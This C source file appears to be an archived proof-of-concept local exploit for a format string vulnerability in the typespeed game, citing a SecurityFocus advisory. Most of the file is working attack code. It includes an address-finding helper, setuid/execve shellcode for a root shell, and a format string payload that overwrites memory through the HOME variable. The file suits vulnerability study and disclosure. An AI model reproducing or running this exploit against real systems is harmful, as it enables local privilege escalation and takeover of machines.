63 lines
No EOL
1.3 KiB
C
63 lines
No EOL
1.3 KiB
C
// source: https://www.securityfocus.com/bid/12569/info
|
|
|
|
typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation.
|
|
|
|
/*
|
|
|
|
Proof of Concept local exploit for typespeed tool
|
|
|
|
"enva" content:
|
|
|
|
*********************************************
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
int main(int argc, char *argv[])
|
|
{
|
|
char *addr_ptr = NULL;
|
|
addr_ptr = getenv(argv[1]);
|
|
printf("%s @ %p\n", argv[1], addr_ptr);
|
|
return 0;
|
|
}
|
|
*********************************************
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#define offset 2
|
|
#define var (0x08050288+0x4)
|
|
|
|
char shellcode[] =
|
|
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
|
|
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
|
|
"\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
|
|
"\x31\xc0\xb0\x01\xcd\x80";
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
char *addr[3] = { ((char *)var +2),
|
|
((char *)var),
|
|
};
|
|
|
|
char buffer[1024];
|
|
int high, low;
|
|
long target;
|
|
|
|
target = 0xbffff950;
|
|
|
|
high = (target & 0xffff0000) >> 16;
|
|
low = (target & 0x0000ffff);
|
|
|
|
high -= 0x8;
|
|
sprintf(buffer, "%s%%.%dx%%%d$hn%%.%dx%%%d$hn",
|
|
&addr,
|
|
high,
|
|
offset,
|
|
(low - high)-0x8,
|
|
offset+1);
|
|
memset(buffer+strlen(buffer), 0x41, 32);
|
|
|
|
setenv("HOME", buffer, 1);
|
|
setenv("SHELLCODE", shellcode, 1);
|
|
system("./enva SHELLCODE");
|
|
system("./typespeed");
|
|
} |